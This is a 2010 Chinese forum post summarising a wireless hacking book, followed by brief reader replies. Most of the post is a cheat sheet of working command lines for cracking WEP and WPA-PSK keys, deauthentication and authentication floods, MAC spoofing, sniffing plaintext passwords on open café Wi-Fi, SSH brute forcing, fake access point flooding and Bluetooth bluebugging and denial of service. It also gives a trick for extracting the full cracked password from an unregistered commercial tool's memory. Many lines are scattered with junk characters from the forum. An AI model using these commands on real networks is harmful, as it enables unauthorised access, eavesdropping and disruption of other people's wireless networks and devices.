查看: 10983|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。8 t5 q7 s' M; Q4 a5 O1 j
& X) \' z# G! N* ?5 f
以下所有操作均在BackTrack 4中进行。' L3 N, E( c% |, ?: n" n

. J. U* ~9 B! C9 M' U6 m! k  P8 T9 u6 R
无线WEP加密P解:
7 R% C* |# l+ O8 E  ?% `- F' N* a2 x( X& u$ D1 k3 N% W* l
注入P解:5 i8 C$ Z$ I2 L& y; t

5 a! U* v/ l. s7 oifconfig
1 S3 N! _( ~2 ?! K8 o
& j( m8 s9 Z. S- G- uifconfig –a
$ f2 K5 }: t$ @0 a$ M( Y6 I: V8 X, B8 f- ?) r. U& M" ?0 p
ifconfig wlan0(无线网卡) up6 v; P- ~6 L% ]5 n

( V8 v8 d4 k% i8 k6 Kairmon-ng start wlan0
7 V- `+ C$ _8 R- q& `0 R+ b0 H. F  {) Z" q4 P  ~& ]7 f
airodump-ng mon0" {) W- u" v: d- ~6 B
6 R1 H- V& p. U  i. U' S% [' |
airodump-ng --ivs –w ivsfile –c 频道 mon0或$ \2 d. l# o% K

( C* H$ q- S2 ?4 x- @- wairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0  b- s8 y4 A) |8 I: ^4 R9 N% `

# |( ?2 A: a6 w+ s$ F3 }aireplay-ng -3 –b BSSID –h Station mon0: T. ^' T% S. t7 L
1 K9 p6 `( Y% c0 b$ E
aircrack-ng ivsfile-01.ivs0 {1 v' q5 L2 f$ l: X7 k* e  c
& J/ ^0 W1 J0 L) n$ E% m
虚连接P解(适用于无客户端连接APP解)/ T" a# g2 m; L# V. m
8 l& q: L+ I) w1 @- U
ifconfig9 e  Q8 X1 f! l0 Q- q: p# p' B/ v

) W. `, u& o2 Tifconfig –a" p+ O* y* t0 r9 R

" {- U, e. E+ k) z" fifconfig wlan0(无线网卡) up
6 s3 p" J0 B- ?( `% U- I" V
) |( I" N0 ~8 [$ m( G. P8 yairmon-ng start wlan04 b8 K7 `3 r1 E, j9 H( _) V5 C  y
1 @0 r. v+ _( Y, \/ h
airodump-ng mon0
8 P4 u8 `; H. i% V* P8 w, n6 h3 u
; i3 k( ~  b( o$ z  h5 pairodump-ng --ivs –w ivsfile –c 频道 mon0或
5 K( g( P  h4 P" R+ _% R& j- L. O% E0 U8 F- |8 J1 W& [! n
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
+ e2 q3 v( E' I# q
: C& |. `: C8 Y% Waireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
* ?( o; l* K* c% ^) Z/ ^- q$ {* m
3 n3 F6 t0 k8 ?. \, yaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon06 I0 p; J  O  |9 ^: Z5 {) a/ i
9 W$ x8 k' t2 Z5 t6 f, H
aircrack-ng ivsfile-01.ivs* \( X8 M% g9 j

9 q2 p! E* K2 [+ k' s2 ~" a, x* T* o6 ~9 r6 N' x+ H
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。8 x2 @1 X1 }' P0 h& r+ I+ k

" l9 q/ o/ I: _: m# b- c8 `5 G+ h; e7 e) c! x; Z, D6 Y6 I0 a4 B& z
WPA-PSKP解
, D; [; ?5 o" L" X" U8 ~' e
; @6 e. I( t& o! y6 W8 `2 M" M" sifconfig* L, L& _+ v0 X) s  A

- l# @# b. i$ i1 Fifconfig –a; p  u( O  s, h6 m

* f) v9 \4 V" q! `4 ^ifconfig wlan0(无线网卡) up
; I, k# V0 {+ ?2 ]3 k
# m( W1 Q2 O9 m- K3 X, H' [airmon-ng start wlan0" N6 u( D: I( k0 @) g; J0 T% z
3 B/ c; _) e# C* a% T1 `
airodump-ng mon0
4 F# k6 K0 b. P, s
6 r2 _! s3 h% X, Q6 p' K+ g5 Eairodump-ng –w capfile –c 频道 mon0
$ B6 G5 }9 `7 N. A& C! A% f: |1 j- j5 C- a) `
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包! X) O3 k, u3 h
; t  q$ {7 _1 }! p) P; j6 \
aircrack-ng –w Dic capfile-01.cap或- k7 D  ]/ q) H$ Y  W

6 R3 f. j" ], h2 {, f0 X% t$ Ecowpatty –f Dic –r capfile-01.cap –s SSID. H; A) X. ?5 c* c* k

5 Q! @) V8 j: V4 X8 S1 u. X* acowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
! g  z* H9 [/ y) D. |% Z; K5 H" v. B/ B! W( I- C8 V6 x& H- R- i
傻瓜式P解软件SpoonWPA。1 e' d! l5 c5 y( E1 f" L

( B- H( j- O9 \BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst" E- s) v( }7 a. b" N

8 U" y, C1 M% [
& M' j5 R) ^: Y7 ?5 E$ l5 [字典文件的生成和上传
6 x' N5 C) X; T' d- B! o/ K' o4 q. v; W# l- q- F( Q+ S
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。  ]( x3 d: a* L; K/ P7 i
3 K9 G& M9 a2 ^. _" k

0 `! Y# v; G! m3 sBT4下开启Tftp:Services—TFTPD—start TFTPD, N  H$ V$ d, E2 t
2 R8 F: a3 U9 b
在Windows的CMD中运行 tftp –i IP put **.dic
& v, l  @( r1 K$ ^' \- M3 ]
( r% H) f  x2 X$ @6 r6 v2 V" I1 J" }3 w" x# e
BT4下开启SSH:Services—SSH—start SSH
. w; m: \: W# k# h, {$ t7 c! l
( J$ u: F/ b; j8 H) XWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root# t1 W( D. j% K, ~# f
2 _; [# n8 s- S* }9 ]) W( Z
- u' ?! ]* `& F& n1 q8 ]* w
AP限制MAC时的解决
0 z% v/ D1 _6 \( G* s7 N1 O5 s9 ^+ N7 @7 w; u; ?, e/ ~$ y* y
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
0 m) ]8 I/ T  b( U* H. \9 t* [# o. |; G' s: g4 L5 J
ifconfig wlan0 hw ether NewMAC7 L- x3 J: n4 h0 n) Z/ y
! A  I* Y* C; }# b

) w! h7 S2 q$ b* P  Q关闭SSID广播的AP探测:
2 `1 W# ?2 e# d: ?3 p3 P8 j+ |  z( B9 M7 H
1.     Deauth攻击:
8 _& ^( a) {0 U! S; e& l
" q  E) E: }& y2 `. F) Fairodump-ng mon0! {/ b5 v# o# d
7 }& N' X: l. k. X0 i9 F/ T/ e
aireplay-ng -0 10 –a BSSID –h Station mon0
4 h! Z: T1 D2 }' M/ X; f& Y( ~) d. v0 c0 ^8 C7 T$ C; O
2.     抓包分析
2 }2 s0 o; v! @  w4 f; [6 i( c) i. H4 S5 S) Z: I$ l2 j% W
Omnipeek2 n7 F# {+ Q, a1 e, t6 ?% _7 _
" b8 I: z% N  u% n, O2 \
Tcpdump –n –e –vvv –i 网卡名: k5 x7 A8 c' j

  j) w' q" l! ^! v- z& l3.     暴力P解3 `. i' B6 F9 i) H) d

( k) ~, T3 w2 j* i8 j+ n! cCharon 1.1暴力P解2 I5 p, e6 t  X6 g

( w2 {) u8 U$ K* ^9 H
: a: G( ~/ f0 d: F无线加密数据包的解密' O2 E! J; t' q# p1 N( |

0 h  w2 ]. o9 T& S+ Z
4 q6 L6 M# B9 x: q1 s- |使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。6 |9 w. G1 k- l8 \0 Y  S

0 P3 X0 s% @/ d+ {FilterNS     DNS解析数据包
/ G8 M: [- m* u+ A; a- L$ R; o' [$ t; g' y: W9 H
Filter:HTTP    WEB访问数据包
* p" x. M( I) P  j, d% O( m
# @1 ]0 V, W% i. T+ Q5 @$ NFilter:msnms   MSN' v7 s% ^. v0 c% V

( ~& T, Y: O7 ]Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
8 i  _8 b, e) L1 Z. Z7 N* W0 Q! H; W; ?* w9 P0 U
使用airdecap-ng解密:$ _8 k; A! o2 D* a, s
- j; X; {" l' ?; P) Y, X# V- {
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
  R8 R6 F- `' {; n+ n
; N6 ^% R1 B, D  x, }/ W6 g* \$ {
咖啡馆中无线数据截取(开放式无加密AP)0 X$ M7 s9 a. c4 b* d, g

( {4 @' A5 X% H1 U8 j9 `" l) h/ a' o1.Airodump-ng –w data –c频道 mon0, z6 Z  Z! g2 ^1 A
+ b  o  \4 g8 h5 z
2.使用WireShark打开分析. ~6 k4 K" O+ H: M6 |
7 s* d9 O# H2 E+ d1 O/ D- |

) K0 u# Y3 F1 e6 a# F  }1 [BT4下的渗透工具:
2 r5 W' b% Z, e9 r! }- E: ?- A  G# w, P" S+ ]
nmap –sP IP/24        判断C段下存活的主机 : {; F4 a% h" b2 p* K* Z: W/ {1 X4 m& R

% ?) p' Q1 c8 L5 Lnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
3 L6 i5 j8 y2 {! A5 a- |" ~: N5 P# K: f9 A# J; N6 u
nmap –vv –sV IP –p port   指定端口的详细信息。。。1 B: e. r0 _9 R
/ c3 U( N. S. c8 E9 W
namp –O IP/24    判断主机的系统版本
$ G5 n- {2 `8 d5 X6 a# a8 u0 Y, N1 d" |; F5 @( d' D& V

& g/ s8 `3 S/ F$ YGUI 版nmap:Zenmap
& u8 r& w8 N  ^" ]* P; W0 `  }' D5 U) w2 S  w( }

* y  M/ [" V8 W2 S9 o' uAmap使用:amap –B IP port2 w, ?; X$ @. X# z

' t, ?0 @3 c+ A" ~3 LNbtscan(扫描Windows网络NetBios信息):  J" }1 y/ @3 ?* u: ]- R
- W8 S7 L* R: V  Y' u
nbtscan –v –s : IP/24
8 |3 n* Z2 g. C( _% J: U) J7 ^$ T( }4 o, E& }
nbtscan –r IP$ Y" m0 C; V( I, x8 m
2 c! h: O* q4 `9 I

* v# O: x9 \3 @, \# DDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
0 I! I' H! J+ I. k9 ~# s7 y$ _: n% A0 z3 [: H
5 ~$ a+ @3 G" i, ]
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
/ j4 j. c8 B/ w5 B" ^$ G4 x
0 u* i3 f+ d0 i# S4 EBruteSSH: ./bruthe.py –h IP –u Username –d Dic
* m' W) t: e+ b2 U2 q9 U% D7 W3 ?; S9 K" g% N7 P2 J
Metasploit3使用; j# X9 Q1 X2 S0 I4 {
无线D.0.S
% D/ `. Q) z" w9 T" ~1 L  Z7 l) @  B" A" N" F* T2 h: b% i
4 ~' x$ k/ s& a' A
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
+ p  q1 r" p" l  h7 G0 |' z) {1 [5 N5 [4 h# W# \9 o
airmon-ng start wlan0
6 B8 w3 v2 G% ^1 X, B7 |3 L" b  T
airodump-ng mon04 F8 g  M1 _3 G3 Q0 ]" s6 U
: h& Y% ~3 W  T; U$ B7 t. M; {
mdk3 mon0 a –a BSSID
" t: l* S1 [& C- [2 I% n* K7 h6 g7 b, `" ~
对所有的AP攻击:mdk3 mon0 a& G3 A; B& m: O6 N5 F$ m
, J" u) c# d" Z2 K

1 n; Y! I+ {* w. F3 W; r$ zDeauth Flood 攻击
# g! `9 k) m4 s1 C3 S2 q- v+ D! X4 x5 R- ]3 l0 u8 B9 R
mdk3 mon0 d –c Channel
) u4 @! j( u! K, U2 O. s1 ]+ k& f% ~3 W) _7 M& j- i8 E
图形化D.O.S攻击:Charon
" n% f" B( m9 s! L  I
/ Z$ z' n7 e$ a* C: C& R( t+ K
8 A- L% C& \% t/ y3 C' c5 D! r4 m当受到攻击时,使用Wireshark抓包可以看到异常信息。) l8 y2 |2 o( `% X+ y+ a# @

- u2 M, E. q2 W, l0 p/ @3 L0 l" {1 o7 U
WPA-PSK高速P解
2 n; k! K0 A" M: }; f% f2 _1 i6 }( O- g$ w) ]
1.       WPA-PSK PMK Hash TablesP解2 x+ _+ D  a$ }
6 _: Z; n! [: \% }
Cowpatty –d HashTable.hash –r ***.cap –s SSID
+ m9 C, \& B3 ]$ P* @5 k/ b
$ x8 Q3 ~0 i/ Q1 n) x8 zHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
4 E7 C. d& z( d! H; E" D0 Q
1 f+ u! z7 i: f2.       GPU辅助高速P解  C/ \& R$ L5 ~0 p

/ h3 F. l  C: o$ o3 J- y) s使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。& }2 v. d5 P- A/ Y

) h) j9 E5 Z/ f! H$ i3.       分布式P解
- A# A- }& Q) [2 |3 L1 D5 P+ F3 {# t0 l( S* q+ q% r
9 y& d9 {7 T& o+ L. F* m5 e# O
AP的伪造
& B: @% J7 h$ y; S1 Y0 ~* o$ T
' W/ Y1 l: C1 @9 b2 C& q; |+ g* E6 E把AP的MAC改成目标AP的MAC
1 o1 R& ?7 ^2 h9 G% U3 |
4 h/ o( g8 z* z% }* p网卡软AP8 P6 J$ }" \3 Y+ M9 W0 R

  P9 ~0 M6 _* |2 b( Y
7 q5 p5 ]: g+ b, J" a2 I8 t伪造大量虚假AP信号:, N! f' I4 S* ~" S' L
" V" \0 I0 L& @: i1 m4 w9 b
随机SSID:mdk3 mon0 b –g –c 频道
. P6 a; C* J# t1 x0 W3 P) s* M( h9 G# }1 s0 S* S' K2 N( l+ l
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
; h+ |3 g: s! m/ m& k
& H$ h4 J0 E- X4 x! ^" ^) J0 x5 c2 F: j5 ^6 E* X7 C; a# S; j; I
War-Driving
9 D: Y$ a, k: Z# R7 H) [/ Z- M( ]0 A0 E
热点地图绘制
4 `6 l8 ]0 d1 I6 w* Z4 _/ T1 Y8 x) s" z3 {
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
" [9 C3 X0 R2 }& U/ s0 A, \" Q" P6 v8 K( y0 _, |$ B0 v
. J: l5 q! f$ p" v
Netstumble& |+ X# d% J, ?' l
& X$ x% I2 o3 `8 G7 J+ H- `  o5 e* A
6 q: t, X& J: f( {5 ]. A) R
蓝牙Hacking
% H9 E; z  G4 B( H# l' A9 ]; i7 G/ J3 N
Windows下的Blue Soleil工具
+ T9 [4 S6 f% X) j8 _
! V! d- E8 _" n9 pBT4:# M' }1 \! n$ ?  u+ E7 V

; t2 w2 Y6 {. [* U% ^2 R# q3 Yhciconfig 查看蓝牙适配器
' g4 ?7 S9 g% F" Z# o- _2 E) C
  \( x5 O5 k/ K" C  t$ ghciconfig hci0 up 载入蓝牙适配器
0 Z3 F. o* i: C: E* ]2 D
- L8 ?, n) X* C5 R( r  f9 s1 v. mhciconfig hci0 class 蓝牙适配器详细信息
, k/ d6 r9 a. ]$ e( F! d- G3 z: Y. M6 ]  i/ P/ d  M% @
* u2 V* a3 n1 |* b9 z" b  d8 j
hcitool(扫描蓝牙)
9 K& g" M! z4 r
6 `3 p, q; C7 D" W, O) xhcitool –i hci0 scan3 }; l/ f5 b) c! U( P% y

" V: M2 f, N4 u. \BTscanner(扫描蓝牙)1 @! U3 r. n. a& c) r" z( [( v
( A/ o7 x" c, y; P7 f& h

$ {6 h' Z6 q, }0 d' f8 q# T蓝牙攻击:# g; T9 K- R7 {0 H
* h3 e, t) F" T4 `/ x0 I0 a
BlueBugging (适用于BlueTooth V1.1的手机)
5 J8 l7 O* C0 I# g# u; T! ^4 ^
3 O0 D- F6 ^) y1 PBluebugger工具:
) [0 l) v0 G" S& t/ J
. r1 f6 _& a% }" ~1 j6 L% UBulebugger –a HD_Addr info2 S( S5 T' j" x
4 v; \; e  R, T$ c: p

: w) L: J, J. o2 ~7 ABlueJacking% G# {( N0 Y* D5 \# e+ N* x+ G
& E) N- D3 {% i0 l
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。+ g4 Y$ {, [" ^: U+ I) l3 i& _
: T. t3 |9 N- v! d* M( X4 w

  Z- _2 t# {4 w1 |# {$ ?; zHD_Addr修改:' b2 F8 `0 ?; k7 b6 i  H( o# x

7 i' ]" `# k7 WBdaddr工具
8 g) m! `$ i$ L5 r5 `4 J) q( q* G7 t' ^% C6 @' ]. l
bdaddr –i 蓝牙设备名 新HD_addr1 Y5 ~+ t# D2 X6 `% Q: {+ _, H

  W% M6 I2 H! m* t( |& }2 x2 X1 M& u' u; z( ?6 Z
蓝牙D.O.S
4 C7 Q. D+ S2 X3 i5 W
4 f6 N' C$ L4 o& M9 @0 A& J+ Ll2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务/ `8 D4 S) m7 S4 H/ P
2 B' r* S: A( g" q. F& ~
hciconfig
- O4 f3 J7 T# A4 ~
$ m% z2 Y5 K+ p6 l* q) e: k, _hciconfig hci0 up
7 ?: }# U+ l1 {  R5 ?! _6 ]5 d( a9 @( Z0 Z9 e7 L
hcitool –i hci0 scan
* x1 f% z" L5 M8 H5 x( v; e8 a; ~+ K  h7 F; S  A
l2ping –s 10000 –目标MAC$ R  X" T& v! l& S, H; e1 ~

: v# J" n& b- ?' Z, d
( i# @) X2 y- D) P不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
. q* w: r! o6 R# w
- Z4 X- G4 W- s# N, k3 D% E./fang –r ************-############ -s2 J$ }8 t% A* s! n/ r0 a

, ^! E- }* |, V4 F  l& n暴力P解************-############的蓝牙设备
7 [! H: F" |$ D% |* a
" ^6 d$ @) @2 ]; I7 s./fang –l 各厂商BD_Addr分配4 k% C9 d+ y! \+ d
- Y6 E; S- `! E% u

4 ^. k! v& w$ u* C. @4 KWifiZoo使用* i  y3 s9 K. b- o
& x& {4 h! I& B7 B/ m
./wifizoo.py –c Capfile
8 G& V8 b0 n; }5 Z% O% ^  k9 L/ Z
  I4 E) j( b$ W% z访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

909

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。% V' t+ O3 m9 J  f, J
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的5 ]# x1 L" l( Y( {! P' r
呵呵 其实也不贵 21块 快递再一点
( a$ J4 u) t  F我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2017-3-30 18:40

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表